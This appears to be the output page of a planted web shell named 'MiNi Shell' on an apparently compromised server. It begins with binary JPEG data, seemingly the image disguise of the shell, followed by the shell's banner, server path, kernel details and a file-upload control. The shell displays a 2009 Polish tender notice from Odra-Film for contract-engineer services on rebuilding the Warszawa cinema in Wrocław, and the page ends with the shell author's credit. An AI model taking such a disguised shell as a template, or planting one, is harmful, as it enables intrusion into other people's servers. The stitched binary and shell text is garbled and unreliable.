JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090930/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090930/338470-N-2009.html

<p class="kh_header"><b>Wrocław: Wykonanie usługi Inżyniera Kontraktu w ramach Projektu Dolnośląskie Centrum Filmowe (przebudowa kina Warszawa we Wrocławiu).</b><br>
<b>Numer ogłoszenia: 338470 - 2009; data zamieszczenia: 30.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Odra-Film , al. Kasztanowa 3a/5, 53-125 Wrocław, woj. dolnośląskie, tel. 071 7937091, faks 071 7940088.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.odra-film.wroc.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie usługi Inżyniera Kontraktu w ramach Projektu Dolnośląskie Centrum Filmowe (przebudowa kina Warszawa we Wrocławiu)..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa polegająca na pełnieniu w trakcie realizacji Projektu funkcji Inżyniera Kontraktu.
Do zadań Inżyniera Kontraktu w szczególności należy:
a)	kierowanie realizacją Projektu,
b)	przygotowanie koniecznych materiałów dla prawidłowej realizacji obowiązków zapisanych w pre-umowie,  
c)	bieżący nadzór - w imieniu Zamawiającego - sposobu i jakości wykonania dokumentacji technicznej i pomoc Zamawiającemu w realizacji praw i obowiązków wynikających z umowy na prace projektowe,
d)	przygotowanie procedury przetargowej na wybór generalnego wykonawcy robót budowlanych wraz z dostawą i montażem wyposażenia i zawarciu z wyłonionym wykonawcą Kontraktu na roboty budowlane oraz doradztwo w przeprowadzeniu postępowania przetargowego,
e)	zarządzanie, kontrola i nadzór nad realizacją Kontraktu na roboty budowlane w szczególności w zakresie: 
-nadzoru inwestorskiego nad realizacją dostaw i montażu wyposażenia,
-nadzoru inwestorskiego we wszystkich wymaganych branżach, 
-rozliczania i kontroli kosztów robót budowlanych i wyposażenia, 
-skompletowania dokumentów niezbędnych do uzyskania pozwolenia na użytkowanie i uczestniczenie w procedurze uzyskania tego pozwolenia,
-końcowego rozliczenia Kontraktu na roboty budowlane,
-kontroli jakości robót w okresie gwarancji. 
f)	wykonywanie w imieniu Zamawiającego obowiązków zapisanych w Programie Operacyjnym związanych z pozyskanymi przez Zamawiającego środkami na współfinansowanie realizacji Projektu, w szczególności obowiązków polegających na przygotowywaniu wniosków o wypłatę dotacji, księgowości i nadzoru finansowego, raportów i rozliczeń (okresowych i końcowych),
g)	zapewnienie wymagań formalnych obciążających Zamawiającego związanych z realizacją Projektu:
-administrowanie Kontraktem na roboty budowlane,
-	nadzór techniczny i prawny nad realizacją robót budowlanych,
-kontrola i weryfikacja dokumentów Wykonawcy robót,
-poświadczanie płatności dla Wykonawcy robót,
-raportowanie..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1, 71.31.00.00-4, 79.21.10.00-6, 79.11.00.00-8, 71.24.80.00-8, 71.63.00.00-3.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 26.02.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.	Każdy Wykonawca zobowiązany jest zabezpieczyć swą ofertę wadium w wysokości: 12.000 zł. (słownie: dwanaście tysięcy złotych). 
2.	Wadium może być wniesione w następujących formach:
a)	pieniądzu;
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c)	gwarancjach bankowych;
d)	gwarancjach ubezpieczeniowych;
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (tj.: Dz. U. z 2008 r. Nr 42, poz. 275).<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: 
a)	posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień, 
b)	posiadają niezbędną wiedzą i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne kwalifikacje i doświadczenie),
c)	znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia oceniana będzie ich łączna sytuacja ekonomiczna i finansowa),
d)	nie podlegają wykluczeniu z postępowania o udzielenie zamówienia.
2.	Opis szczegółowych warunków udziału w postępowaniu oraz sposobu dokonywania oceny spełniania tych warunków:
a)	w zakresie doświadczenia zawodowego: w okresie ostatnich 3 lat przed dniem wszczęcia niniejszego postępowania, a jeżeli okres prowadzenia działalności Wykonawcy jest krótszy -  w tym okresie - Wykonawca winien wykonać usługi odpowiadające swoim rodzajem i wartością usługom stanowiącym przedmiot zamówienia, tj.: 
- przynajmniej 2 usługi Inwestora Zastępczego,Inżyniera Kontraktu obejmujące swoim zakresem co najmniej usługi wskazane we Wspólnym Słowniku Zamówień (CPV) w pozycjach: 
o	71.24.70.00-1 Nadzór nad robotami budowlanymi 
o	71.31.00.00-4 Doradcze usługi inżynieryjne i budowlane 
o	79.21.10.00-6 Usługi księgowe 
o	79.11.00.00-8 Usługi w zakresie doradztwa prawnego i reprezentacji prawnej 
o	71.24.80.00-8  Nadzór nad projektem i dokumentacją
wykonywane dla zadań inwestycyjnych polegających na budowie kubaturowych obiektów budowlanych użyteczności publicznej, przewidzianych na podstawie Rozporządzenia Rady Ministrów z dnia 30.12.1999 r. w sprawie Polskiej Klasyfikacji Obiektów Budowlanych (PKOB) (Dz. U. z 1999r. Nr 112 poz. 1316 ze zm.) do sekcji 1, dział 12 PKOB, o kubaturze nie mniejszej niż 18.000 m3 każdy, przy czym przynajmniej jeden z obiektów budowlanych musi zawierać salę kinową lub teatralną lub koncertową lub widowiskową o liczbie miejsc na widowni nie mniejszej niż 200. 
-przynajmniej jedną usługę przygotowania dokumentów (SIWZ) niezbędnych do udzielenia zamówienia publicznego na wybór wykonawcy robót budowlanych i pomocy Zamawiającemu w przeprowadzeniu tego postępowania, zakończonego zawarciem umowy o wartości nie mniejszej niż 15 mln. zł. netto.
b)	w zakresie osób i/lub podmiotów pozostających do dyspozycji Wykonawcy, Wykonawca winien dysponować:
b1) do pełnienia funkcji Specjalisty - Kierownika Realizacji Projektu osobą dysponującą aktualnymi uprawnieniami do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami w branży konstrukcyjno - budowlanej bez ograniczeń oraz doświadczeniem polegającym na kierowaniu lub nadzorowaniu robotami w ramach budowy obiektu budowlanego użyteczności publicznej, przewidzianego na podstawie Rozporządzenia Rady Ministrów z dnia 30.12.1999 r. w sprawie Polskiej Klasyfikacji Obiektów Budowlanych (PKOB) (Dz. U. z 1999r. Nr 112 poz. 1316 ze zm.) do sekcji 1, dział 12 PKOB, o kubaturze nie mniejszej niż 18.000 m3, przy czym obiekt budowlany musi zawierać salę kinową lub teatralną lub koncertową lub widowiskową,
b2) do pełnienia funkcji Specjalisty ds. monitorowania i rozliczeń osobą posiadającą doświadczenie w prowadzeniu rozliczeń przynajmniej jednego zadania inwestycyjnego dofinansowanego środkami Unii Europejskiej lub z Norweskiego Mechanizmu Finansowego (EOG),
b3) do pełnienia funkcji Specjalisty ds. obsługi prawnej, w tym zamówień publicznych osobą posiadającą wyższe wykształcenie prawnicze i co najmniej 3 letnie doświadczenie w przygotowaniu i przeprowadzaniu postępowań o udzielenie zamówień publicznych,
b4) do pełnienia funkcji Specjalisty ds. bieżącego nadzoru sposobu i jakości wykonania dokumentacji technicznej osobą legitymującą się aktualnymi uprawnieniami do projektowania w branży architektonicznej bez ograniczeń oraz co najmniej 10 letnim doświadczeniem w realizacji usług projektowych, jako projektant,
b5) do pełnienia funkcji Specjalisty ds. kinotechniki - osobą, która nadzorowała realizację co najmniej jednego, zrealizowanego przez inwestora projektu z zakresu kinotechniki w obiekcie zaliczonym na podstawie Rozporządzenia Rady Ministrów z dnia 30.12.1999 r. w sprawie Polskiej Klasyfikacji Obiektów Budowlanych (PKOB) (Dz.U.99.112.1316 ze zm.) do sekcji 1, dział 12, grupa: 126 klasa 1261 Polskiej Klasyfikacji Obiektów Budowlanych jako (Kino), 
b6) do pełnienia funkcji Inspektora nadzoru w branży konstrukcyjno - budowlanej osobą dysponującą aktualnymi uprawnieniami do pełnienia samodzielnych funkcji technicznych w budownictwie do kierowania robotami w branży konstrukcyjno - budowlanej bez ograniczeń oraz doświadczeniem polegającym na nadzorowaniu lub kierowaniu robotami w ramach budowy obiektu budowlanego zaliczonego na podstawie Rozporządzenia Rady Ministrów z dnia 30.12.1999 r. w sprawie Polskiej Klasyfikacji Obiektów Budowlanych (PKOB) (Dz.U.99.112.1316 ze zm.) do sekcji 1, dział 12 PKOB, o kubaturze nie mniejszej niż 18.000 m3 i posiadającym co najmniej 10 letnie doświadczenie zawodowe,
b7) do pełnienia funkcji branżowych inspektorów nadzoru osobami dysponującymi aktualnymi uprawnieniami do pełnienia samodzielnych funkcji technicznych w budownictwie bez ograniczeń do kierowania robotami w branżach:
-	instalacyjnej w zakresie sieci, instalacji i urządzeń: wodociągowych i kanalizacyjnych, cieplnych i wentylacyjnych,
-	elektrycznej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych,
z tym zastrzeżeniem, że każdy branżowy inspektor nadzoru musi mieć co najmniej 10 letnie doświadczenie zawodowe. 

Uwaga: 
-	warunki określone w pkt. b1) - b7) będą spełnione również w przypadku Wykonawców, którzy przedstawią pisemne zobowiązanie(a) innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia,
-	Zamawiający dopuszcza łączenie funkcji Specjalistów z wyjątkiem Specjalisty - Kierownika Realizacji Projektu, którego funkcja nie może być łączona z pozostałymi osobami,podmiotami,
-	użyte w opisie warunków udziału w postępowaniu w pkt. b1 i b6) pojęcie nadzorowanie lub kierowanie robotami dotyczy funkcji pełnionych przez uczestników procesu budowlanego, o których mowa w art. 17 pkt. 2 i 4 ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. Nr 156 poz. 1118 z 2006 r. ze zm.).
-	użyte w opisie warunków udziału w postępowaniu w pkt. a), b1), b6) pojęcie budowa należy rozumieć jako wykonywanie obiektu budowlanego w określonym miejscu, a także odbudowę, rozbudowę, nadbudowę oraz przebudowę obiektu budowlanego. Przy tym zakres rzeczowy budowy musi obejmować przynajmniej następujące roboty: ogólnobudowlane, instalacje wodno-kanalizacyjne, c.o., wentylacyjne oraz elektryczne. Natomiast odbudowa, rozbudowa, nadbudowa oraz przebudowa obiektu budowlanego musi obejmować cały obiekt lub część tego obiektu o kubaturze nie mniejszej niż 18.000 m3,
-	użyte w opisie warunków udziału w postępowaniu w pkt. a) pojęcie obiektu użyteczności publicznej oznacza zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. z 2002 nr 75 poz. 690): budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, opieki zdrowotnej, opieki społecznej i socjalnej, obsługi bankowej, handlu, gastronomii, usług, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, świadczenia usług pocztowych lub telekomunikacyjnych oraz inny ogólnodostępny budynek przeznaczony do wykonywania podobnych funkcji, w tym także budynek biurowy i socjalny.
c)  w zakresie sytuacji ekonomicznej i finansowej Wykonawca winien:
c1) być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej o sumie ubezpieczenia nie mniejszej niż 1 milion złotych,
c2) posiadać środki finansowe lub zdolność kredytową w wysokości minimalnej 100 tys. złotych, przy założeniu, że środki finansowe i zdolność kredytowa mogą być sumowane do wskazanej wysokości, a zdolność kredytowa to możliwość uzyskania nowego kredytu we wskazanej wysokości, przy uwzględnieniu wcześniej zaciągniętych zobowiązań kredytowych. 
Uwaga:
Dla wartości wskazanych w pkt. c1) i c2) w walucie innej niż PLN Zamawiający przyjmuje przelicznik wskazany przez wystawcę dokumentu, a jeżeli wystawca dokumentu takiego przelicznika nie wskazał - według średniego kursu NBP z dnia wszczęcia niniejszego postępowania.
3.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. Przepisy dotyczące wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o zamówienie. Przy ocenie spełniania warunków przez osoby wspólnie składające ofertę Zamawiający przyjmuje, że wymagania, o których mowa w art. 22 ust. 1 pkt. 1-3  mogą spełniać tylko niektórzy z tych Wykonawców, tak by sumarycznie w odniesieniu do wszystkich tych Wykonawców były spełnione łącznie. Wymagania, o których mowa w art. 22 ust. 1 pkt. 4 musi spełnić każdy z Wykonawców.
4.	Ocena spełniania każdego z ww. warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia, w oparciu o informacje zawarte w dokumentach lub oświadczeniach , które należy złożyć wraz z ofertą oraz w terminie i miejscu składania ofert.
5.	Nie spełnienie któregokolwiek z ww. warunków udziału w postępowaniu skutkować będzie wykluczeniem wykonawcy z postępowania, z zastrzeżeniem postanowień art. 26 ust. 3 ustawy..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1.	Oświadczenie wykonawcy o spełnianiu warunków podmiotowych na podstawie art. 22 (wzór oświadczenia stanowi załącznik nr 2 do SIWZ). 
2.	Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. W przypadku gdy wykonawcą jest podmiot zobowiązany do rejestracji w Krajowym Rejestrze Sądowym, a w  załączonym odpisie z rejestru nie uwzględniono zmian w tekście dokumentu załączonego do oferty, wynikłych po dacie jego wystawienia, wykonawca  dodatkowo zobowiązany jest do dołączenia do oferty dowodu złożenia w sądzie rejestrowym ww. zmian (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia w ofercie musza być złożone przedmiotowe dokumenty dla każdego z nich).
3.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4 - 8 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia w ofercie musza być złożone przedmiotowe dokumenty dla każdego z nich).
4.	Aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia w ofercie musza być złożone przedmiotowe dokumenty dla każdego z nich).
5.	Aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające odpowiednio, że Wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczenia, że Wykonawca uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia w ofercie musza być złożone przedmiotowe dokumenty dla każdego z nich).
6.	Wykaz usług, wykonanych w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich zakresu oraz daty i miejsca wykonania, 
7.	Dokumenty potwierdzające, że wykazane usługi zostały wykonane należycie (np.: protokoły odbioru, referencje, świadectwa przejęcia).
8.	Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia ,wraz z informacjami na temat ich kwalifikacji zawodowych i (jeśli jest wymagane) doświadczenia, niezbędnymi do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności, a jeżeli w wykazie Wykonawca wskazał osoby, którymi będzie dysponował na podstawie porozumienia z innymi podmiotami - również pisemne zobowiązanie tych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia,
9.	Dokumenty stwierdzające, że osoby, które będą uczestniczyć w realizacji zamówienia posiadają wymagane uprawnienia, tj.: aktualne uprawnienia do pełnienia samodzielnych funkcji technicznych w budownictwie, wraz z aktualnymi zaświadczeniami przynależności do właściwych izb zawodowych, zgodnie z ustawą z dnia 15 grudnia 2000r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów (Dz. U. z 2001r. Nr 5 poz. 42 ze zm.). Ze względu na brak przepisów prawnych Zamawiający nie wymaga by Specjalista ds. kinotechniki posiadał odrębne uprawnienia do nadzorowania i legitymował się przynależnością do właściwych izb samorządu zawodowego.
10.	Polisa, a w przypadku jej braku inny dokument, potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności w wymaganej wysokości. 
11.	Informacja z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzająca wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy w wysokości odpowiadającej warunkowi udziału, wystawiona nie wcześniej, niż 3 miesiące przed upływem terminu składania ofert. Jeżeli w informacji banku zawarte zostanie sformułowanie, że Wykonawca posiada środki finansowe lub zdolność kredytową na poziomie 6-cyfrowym, wówczas Zamawiający uzna, że Wykonawca posiada środki finansowe lub zdolność kredytową w wysokości odpowiadającej najniżej kwocie składającej się z 6 cyfr.
Uwaga:
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 2, 4, 5 składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie,
c)	nie zalega z uiszczaniem podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentów, o których mowa w pkt 3, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.odra-film.wroc.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Odra Film, al. Kasztanowa 3a/5
53-125 Wrocław.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.10.2009 godzina 10:00, miejsce: Odra Film, al. Kasztanowa 3a/5
53-125 Wrocław
sekretariat Dyrektora.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com